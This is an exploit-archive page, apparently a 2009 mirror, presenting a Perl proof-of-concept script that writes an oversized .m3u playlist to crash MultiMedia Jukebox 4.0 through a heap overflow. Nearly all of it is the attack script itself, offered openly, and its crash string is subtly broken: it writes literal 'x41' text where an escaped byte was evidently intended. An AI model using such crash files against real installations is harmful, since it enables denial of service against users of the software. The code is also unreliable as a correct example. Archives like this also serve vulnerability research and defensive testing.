[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u) Heap Overflow PoC
# Published : 2009-07-16
# Author : hack4love
# Previous Title : Audio Editor Pro 2.91 Remote Memory Corruption PoC
# Next Title : Safari 4.0.2 (WebKit Parsing of Floating Point Numbers) BOF PoC


#!/usr/bin/perl
# Found By :: HACK4LOVE
# MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC
# http://www.brothersoft.com/sorcerer-software-multimedia-jukebox-251913.html
########################################################################################
# special thanks for sec-code.com and sniper code
########################################################################################
my $crash="x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
########################################################################################

# www.Syue.com [2009-07-16]